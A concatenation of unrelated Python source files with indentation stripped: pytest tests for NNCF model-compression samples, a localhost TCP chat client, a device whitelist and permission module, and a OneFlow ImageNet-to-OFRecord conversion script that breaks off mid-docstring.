sample_type, config_path, dataset_name, batch_size = request.param
dataset_path = DATASET_PATHS[sample_type][dataset_name](dataset_dir)
with config_path.open() as f:
jconfig = json.load(f)
if "checkpoint_save_dir" in jconfig.keys():
del jconfig["checkpoint_save_dir"]
jconfig["dataset"] = dataset_name
return {
"sample_type": sample_type,
'nncf_config': jconfig,
"model_name": jconfig["model"],
"dataset_path": dataset_path,
"batch_size": batch_size,
}
@pytest.fixture(scope="module")
def case_common_dirs(tmp_path_factory):
return {
"checkpoint_save_dir": str(tmp_path_factory.mktemp("models"))
}
@pytest.mark.parametrize(" multiprocessing_distributed",
(True, False),
ids=['distributed', 'dataparallel'])
def test_pretrained_model_eval(config, tmp_path, multiprocessing_distributed):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--mode": "test",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(name=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(name=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_pretrained_model_train(config, tmp_path, multiprocessing_distributed, case_common_dirs):
checkpoint_save_dir = os.path.join(case_common_dirs["checkpoint_save_dir"],
"distributed" if multiprocessing_distributed else "data_parallel")
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--mode": "train",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 1,
"--checkpoint-save-dir": checkpoint_save_dir,
"--dist-url": "tcp://127.0.0.1:8989"
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
last_checkpoint_path = os.path.join(checkpoint_save_dir, get_name(config_factory.config) + "_last.pth")
assert os.path.exists(last_checkpoint_path)
assert torch.load(last_checkpoint_path)['compression_level'] in (CompressionLevel.FULL, CompressionLevel.PARTIAL)
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_trained_model_eval(config, tmp_path, multiprocessing_distributed, case_common_dirs):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = os.path.join(case_common_dirs["checkpoint_save_dir"],
"distributed" if multiprocessing_distributed else "data_parallel",
get_name(config_factory.config) + "_last.pth")
args = {
"--mode": "test",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--weights": ckpt_path,
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
def get_resuming_checkpoint_path(config_factory, multiprocessing_distributed, checkpoint_save_dir):
return os.path.join(checkpoint_save_dir,
"distributed" if multiprocessing_distributed else "data_parallel",
get_name(config_factory.config) + "_last.pth")
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_resume(config, tmp_path, multiprocessing_distributed, case_common_dirs):
checkpoint_save_dir = os.path.join(str(tmp_path), "models")
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = get_resuming_checkpoint_path(config_factory, multiprocessing_distributed,
case_common_dirs["checkpoint_save_dir"])
if "max_iter" in config_factory.config:
config_factory.config["max_iter"] += 2
args = {
"--mode": "train",
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 2,
"--checkpoint-save-dir": checkpoint_save_dir,
"--resume": ckpt_path,
}
if multiprocessing_distributed:
args["--multiprocessing-distributed"] = None
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
last_checkpoint_path = os.path.join(checkpoint_save_dir, get_name(config_factory.config) + "_last.pth")
assert os.path.exists(last_checkpoint_path)
assert torch.load(last_checkpoint_path)['compression_level'] in (CompressionLevel.FULL, CompressionLevel.PARTIAL)
@pytest.mark.parametrize(
"multiprocessing_distributed", [
pytest.param(True, marks=pytest.mark.dependency(depends=["train_distributed"])),
pytest.param(False, marks=pytest.mark.dependency(depends=["train_dataparallel"]))],
ids=['distributed', 'dataparallel'])
def test_export_with_resume(config, tmp_path, multiprocessing_distributed, case_common_dirs):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
ckpt_path = get_resuming_checkpoint_path(config_factory, multiprocessing_distributed,
case_common_dirs["checkpoint_save_dir"])
onnx_path = os.path.join(str(tmp_path), "model.onnx")
args = {
"--mode": "test",
"--config": config_factory.serialize(),
"--resume": ckpt_path,
"--to-onnx": onnx_path
}
runner = Command(create_command_line(args, config["sample_type"]))
res = runner.run()
assert res == 0
assert os.path.exists(onnx_path)
def test_export_with_pretrained(tmp_path):
config = SampleConfig()
config.update({
"model": "resnet18",
"dataset": "imagenet",
"input_info": {
"sample_size": [2, 3, 299, 299]
},
"num_classes": 1000,
"compression": {"algorithm": "magnitude_sparsity"}
})
config_factory = ConfigFactory(config, tmp_path / 'config.json')
onnx_path = os.path.join(str(tmp_path), "model.onnx")
args = {
"--mode": "test",
"--config": config_factory.serialize(),
"--pretrained": '',
"--to-onnx": onnx_path
}
runner = Command(create_command_line(args, "classification"))
res = runner.run()
assert res == 0
assert os.path.exists(onnx_path)
@pytest.mark.parametrize(('algo', 'ref_weight_decay'),
(('rb_sparsity', 0),
('const_sparsity', 1e-4),
('magnitude_sparsity', 1e-4),
('quantization', 1e-4)))
def test_get_default_weight_decay(algo, ref_weight_decay):
config = NNCFConfig()
config.update({"compression": {"algorithm": algo}})
assert ref_weight_decay == get_default_weight_decay(config)
def test_cpu_only_mode_produces_cpu_only_model(config, tmp_path, mocker):
config_factory = ConfigFactory(config['nncf_config'], tmp_path / 'config.json')
args = {
"--data": config["dataset_path"],
"--config": config_factory.serialize(),
"--log-dir": tmp_path,
"--batch-size": config["batch_size"] * torch.cuda.device_count(),
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
"--epochs": 1,
"--cpu-only": None
}
command_line = " ".join(key if val is None else "{} {}".format(key, val) for key, val in args.items())
if config["sample_type"] == "classification":
import examples.classification.main as sample
if is_staged_quantization(config['nncf_config']):
mocker.patch("examples.classification.staged_quantization_worker.train_epoch_staged")
mocker.patch("examples.classification.staged_quantization_worker.validate")
import examples.classification.staged_quantization_worker as staged_worker
staged_worker.validate.return_value = (0, 0)
else:
mocker.patch("examples.classification.main.train_epoch")
mocker.patch("examples.classification.main.validate")
sample.validate.return_value = (0, 0)
elif config["sample_type"] == "semantic_segmentation":
import examples.semantic_segmentation.main as sample
import examples.semantic_segmentation.train
mocker.spy(examples.semantic_segmentation.train.Train, "__init__")
elif config["sample_type"] == "object_detection":
import examples.object_detection.main as sample
mocker.patch("examples.object_detection.main.train")
sample.main(shlex.split(command_line))
# pylint: disable=no-member
if config["sample_type"] == "classification":
if is_staged_quantization(config['nncf_config']):
import examples.classification.staged_quantization_worker as staged_worker
model_to_be_trained = staged_worker.train_epoch_staged.call_args[0][2] # model
else:
model_to_be_trained = sample.train_epoch.call_args[0][1] # model
elif config["sample_type"] == "semantic_segmentation":
model_to_be_trained = examples.semantic_segmentation.train.Train.__init__.call_args[0][1] # model
elif config["sample_type"] == "object_detection":
model_to_be_trained = sample.train.call_args[0][0] # net
for p in model_to_be_trained.parameters():
assert not p.is_cuda
class SampleType(Enum):
CLASSIFICATION = auto()
SEMANTIC_SEGMENTATION = auto()
OBJECT_DETECTION = auto()
class TestCaseDescriptor:
config_name: str
config_path: Path
sample_type: SampleType
dataset_dir: Path
dataset_name: str
is_real_dataset: bool = False
batch_size: int
num_weights_to_init: int
def batch(self, batch_size: int):
self.batch_size = batch_size
return self
def config(self, config_name: str):
self.config_path = TEST_ROOT.joinpath("data", "configs", "hawq", config_name)
self.config_name = config_name
return self
def sample(self, sample_type: SampleType):
self.sample_type = sample_type
return self
def real_dataset(self, dataset_name: str):
self.dataset_name = dataset_name
self.is_real_dataset = True
return self
def mock_dataset(self, dataset_name: str):
self.dataset_dir = TEST_ROOT.joinpath("data", "mock_datasets", dataset_name)
return self
def num_weights(self, n: int):
self.num_weights_to_init = n
return self
def __str__(self):
return '_'.join([self.config_name, ])
TEST_CASE_DESCRIPTORS = [
TestCaseDescriptor().
config("inception_v3_cifar10_mixed_int.json").
sample(SampleType.CLASSIFICATION).real_dataset('cifar10').batch(2).num_weights(96),
TestCaseDescriptor().
config("inception_v3_cifar10_mixed_int_staged.json").
sample(SampleType.CLASSIFICATION).real_dataset('cifar10').batch(2).num_weights(96),
TestCaseDescriptor().
config("resnet18_cifar10_mixed_int.json").
sample(SampleType.CLASSIFICATION).real_dataset('cifar10').batch(2).num_weights(20),
TestCaseDescriptor().
config("resnet18_cifar10_mixed_int_staged.json").
sample(SampleType.CLASSIFICATION).real_dataset('cifar10').batch(2).num_weights(20),
TestCaseDescriptor().
config("ssd300_vgg_voc_mixed_int.json").
sample(SampleType.OBJECT_DETECTION).mock_dataset('voc').batch(2).num_weights(35),
TestCaseDescriptor().
config("unet_camvid_mixed_int.json").
sample(SampleType.SEMANTIC_SEGMENTATION).mock_dataset('camvid').batch(2).num_weights(23),
TestCaseDescriptor().
config("icnet_camvid_mixed_int.json").
sample(SampleType.SEMANTIC_SEGMENTATION).mock_dataset('camvid').batch(2).num_weights(66)
]
@pytest.fixture(params=TEST_CASE_DESCRIPTORS, ids=[str(d) for d in TEST_CASE_DESCRIPTORS])
def hawq_config(request, dataset_dir):
desc: TestCaseDescriptor = request.param
if desc.is_real_dataset:
desc.dataset_dir = Path(
dataset_dir if dataset_dir else os.path.join(tempfile.gettempdir(), desc.dataset_name))
return desc
def test_hawq_init(hawq_config, tmp_path, mocker):
args = {
"--data": str(hawq_config.dataset_dir),
"--config": str(hawq_config.config_path),
"--log-dir": tmp_path,
"--batch-size": hawq_config.batch_size,
"--workers": 0, # Workaround for the PyTorch MultiProcessingDataLoader issue
}
command_line = " ".join(f'{key} {val}' for key, val in args.items())
if hawq_config.sample_type == SampleType.CLASSIFICATION:
import examples.classification.main as sample
mocker.patch("examples.classification.staged_quantization_worker.train_staged")
mocker.patch("examples.classification.main.train")
elif hawq_config.sample_type == SampleType.SEMANTIC_SEGMENTATION:
import examples.semantic_segmentation.main as sample
mocker.patch("examples.semantic_segmentation.main.train")
elif hawq_config.sample_type == SampleType.OBJECT_DETECTION:
import examples.object_detection.main as sample
mocker.patch("examples.object_detection.main.train")
from nncf.quantization.init_precision import HAWQPrecisionInitializer
set_chosen_config_spy = mocker.spy(HAWQPrecisionInitializer, "set_chosen_config")
sample.main(shlex.split(command_line))
bitwidth_list = set_chosen_config_spy.call_args[0][1]
assert len(bitwidth_list) == hawq_config.num_weights_to_init
assert 4 in bitwidth_list
assert 8 in bitwidth_list
|
tcp_chat_client.py
|
# -*- coding:utf8 -*-
# python3
from socket import *
import threading
import time
HOST = '127.0.0.1'
PORT = 5000
ADDR = (HOST, PORT)
BUFSIZ = 1024
tcp_client = socket(AF_INET, SOCK_STREAM)
tcp_client.connect(ADDR)
def send_message():
while True:
input_data = input(">>> ")
if not input_data:
break
tcp_client.send(bytes(input_data, 'utf8'))
tcp_client.close()
def recv_message():
while True:
get_data = tcp_client.recv(BUFSIZ)
if get_data:
print(get_data)
time.sleep(1)
if __name__ == '__main__':
recv_threading = threading.Thread(target=recv_message,args=())
recv_threading.start()
send_threading = threading.Thread(target=send_message,args=())
send_threading.start()
|
permission.py
|
import os
import time
import threading
import uuid
import PySimpleGUI as sg
prompt_open = False
user_response = ""
permission_tokens = []
TOKEN_TIMEOUT_S = 60
def is_device_allowed(current_setting, device_id, device_name, token):
if current_setting == 1: # allow all
return 1
if current_setting == 2: # block all
return -1
if is_device_in_list(device_id, "whitelist.txt"):
return 1
if is_device_in_list(device_id, "blacklist.txt"):
return -1
if token in permission_tokens:
permission_tokens.remove(token)
return 1
return 0 # client needs to request permission
def is_device_in_list(device_id, filename):
if not os.path.isfile(filename):
return False
with open(filename, "r") as f:
for line in f.readlines():
if line[:-1] == device_id: # remove \n for comparison
return True
return False
def add_device_to_list(device_id, filename):
if not os.path.isfile(filename):
with open(filename, "w+") as f:
f.write("# File must end with an empty line")
f.write("\n")
with open(filename, "a+") as f:
f.write(device_id)
f.write("\n")
def set_user_response(val):
global user_response, prompt_open
user_response = val
prompt_open = False
def create_single_match_token():
token = uuid.uuid4().hex
global permission_tokens
permission_tokens.append(token)
t_token = threading.Thread(target=set_token_timeout, args=(token, ))
t_token.start()
return token
# remove the token after a certain amount of time has passed
def set_token_timeout(token):
global permission_tokens
time.sleep(TOKEN_TIMEOUT_S)
try:
permission_tokens.remove(token)
except ValueError:
pass
def request_permission_for_device(device_id, device_name, queue):
global prompt_open
if prompt_open: # prevent multiple popups
return ""
user_input = ""
# put a command into the queue. will be called by App
queue.put_nowait(
("permission_request", (device_name, device_id))
)
# wait for a response.
# put the item back last in the queue if it is not what we need
while True:
if queue.empty():
continue
# prevent going out of range, when another thread pops the item at indexing time
try:
last_item_key = queue.queue[0][0]
except IndexError:
continue
if last_item_key == "permission_response":
item = queue.get_nowait()
user_input = item[1]
break
# white-/blacklist if necessary
if user_input == "allow":
add_device_to_list(device_id, "whitelist.txt")
elif user_input == "block":
add_device_to_list(device_id, "blacklist.txt")
prompt_open = False
return user_input
def on_permission_response(user_input):
if user_input == "allow":
add_device_to_list(device_id, "whitelist.txt")
elif user_input == "block":
add_device_to_list(device_id, "blacklist.txt")
|
imagenet_ofrecord.py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to OFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
train_directory/part-00000
train_directory/part-00001
...
train_directory/part-01023
and
validation_directory/part-00000
validation_directory/part-00001
...
validation_directory/part-01023
Each record within the OFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
"""
from datetime import datetime
import os
import random
import sys
import threading
import re
import argparse
import glob
import numpy as np
import six
import cv2
import oneflow.core.record.record_pb2 as of_record
import struct
"""
# train dataset to ofrecord
python3 imagenet_ofrecord.py \
--train_directory data/imagenet/train \
--output_directory data/imagenet/ofrecord/train \
--label_file imagenet_lsvrc_2015_synsets.txt \
--shards 1024 --num_threads 8 --name train \
--bounding_box_file imagenet_2012_bounding_boxes.csv \
--height 224 --width 224
# val dataset to ofrecord
python3 imagenet_ofrecord.py \
--validation_directory data/imagenet/validation \
--output_directory data/imagenet/ofrecord/validation \
--label_file imagenet_lsvrc_2015_synsets.txt --name validation \
--shards 32 --num_threads 4 --name validation \
--bounding_box_file imagenet_2012_bounding_boxes.csv \
--height 224 --width 224
"""
arg_parser = argparse.ArgumentParser(description =
'The python script to resize pics ')
arg_parser.add_argument('--resize', dest = 'resize', default = False, help = 'resize image')
arg_parser.add_argument('--name', dest='name', default='train', \
help = 'data_file_type')
arg_parser.add_argument('--width', dest='width', default=0, \
type=int, help='fixed image width')
arg_parser.add_argument('--height', dest='height', default=0, \
type=int, help='fixed image height')
arg_parser.add_argument('--train_directory', dest = 'train_directory',\
default='/tmp/', help='Training data directory')
arg_parser.add_argument('--validation_directory', dest = 'validation_directory', \
default='/tmp/', help='Validation data directory')
arg_parser.add_argument('--output_directory', dest = 'output_directory', \
default='/tmp/', help = 'Output data directory')
arg_parser.add_argument('--shards', dest='shards',\
default=1024, type=int, help='Number of shards in making OFRecord files.')
arg_parser.add_argument('--num_threads', dest='num_threads', default = 8, \
type=int, help='Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
arg_parser.add_argument('--label_file', dest = 'labels_file', \
default = 'imagenet_lsvrc_2015_synsets.txt', help = 'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
arg_parser.add_argument('--imagenet_metadata_file', dest = 'imagenet_metadata_file', \
default = 'imagenet_metadata.txt', help = 'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
arg_parser.add_argument('--bounding_box_file', dest = 'bounding_box_file', \
default = './imagenet_2012_bounding_boxes.csv', help = 'Bounding box file')
ARGS = arg_parser.parse_args()
def _int32_feature(value):
"""Wrapper for inserting int32 features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(int32_list=of_record.Int32List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(float_list=of_record.FloatList(value=value))
def _double_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(double_list=of_record.DoubleList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
# if isinstance(value, six.string_types):
# value = six.binary_type(value, encoding='utf-8')
return of_record.Feature(bytes_list=of_record.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, index, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = of_record.OFRecord(feature={
'data_id': _bytes_feature(str(index).encode('utf-8')),
'height': _int32_feature(height),
'width': _int32_feature(width),
'colorspace': _bytes_feature(colorspace.encode('utf-8')),
'channels': _int32_feature(channels),
'class/label': _int32_feature(label),
'class/synset': _bytes_feature(synset.encode('utf-8')),
'class/text': _bytes_feature(human.encode('utf-8')),
'object/bbox/xmin': _float_feature(xmin),
'object/bbox/xmax': _float_feature(xmax),
'object/bbox/ymin': _float_feature(ymin),
'object/bbox/ymax': _float_feature(ymax),
'object/bbox/label': _int32_feature([label] * len(xmin)),
'format': _bytes_feature(image_format.encode('utf-8')),
'filename': _bytes_feature(os.path.basename(filename).encode('utf-8')),
'encoded': _bytes_feature(image_buffer)})
return example
class ImageCoder(object):
"""Helper class that provides image coding utilities."""
def __init__(self,size = None):
self.size = size
def _resize(self, image_data):
if self.size != None and image_data.shape[:2] != self.size:
return cv2.resize(image_data, self.size)
return image_data
def image_to_jpeg(self, image_data, resize=ARGS.resize):
# image_data = cv2.imdecode(np.fromstring(image_data, np.uint8), 1) # deprecated,
image_data = cv2.imdecode(np.frombuffer(image_data, np.uint8), 1)
if resize:
image_data = self._resize(image_data)
return cv2.imencode(".jpg", image_data)[1].tobytes(), image_data.shape[0], image_data.shape[1]
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with open(filename, 'rb') as f:
image_data = f.read()
image_data,height, width = coder.image_to_jpeg(image_data)
#print(height, width)
return image_data,height, width
# Decode the RGB JPEG.
# image_data = coder._resize(image_data)
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, indexs, humans, bboxes, num_shards):
"""Processes and saves list of images as OFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
# output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_filename = 'part-%.5d' % (shard)
output_file = os.path.join(ARGS.output_directory, output_filename)
f = open(output_file, 'wb')
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
index = indexs[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except:
print(filename)
continue
# print('filename, label, index,synset, human, bbox,height, width >>>>>>>>>>>>>>>>>>>>>>>>>>>>\n',
# filename , label, index,synset, human, bbox,height, width)
example = _convert_to_example(filename, image_buffer, label, index,
synset, human, bbox,
height, width)
l = example.ByteSize()
f.write(struct.pack("q", l))
f.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
f.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, indexs, humans,
bboxes, num_shards):
"""Process and save list of images as OFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), ARGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (ARGS.num_threads, ranges))
sys.stdout.flush()
# Create a generic utility for converting all image codings.
if ARGS.width <= 0 or ARGS.height <= 0:
coder = ImageCoder()
else:
coder = ImageCoder((ARGS.width, ARGS.height))
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, indexs, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
for t in threads:
t.join()
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
open(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 0# use to be 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
if not os.path.exists(os.path.join(data_dir, synset)):
continue
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = glob.glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved OFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels, shuffled_index
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
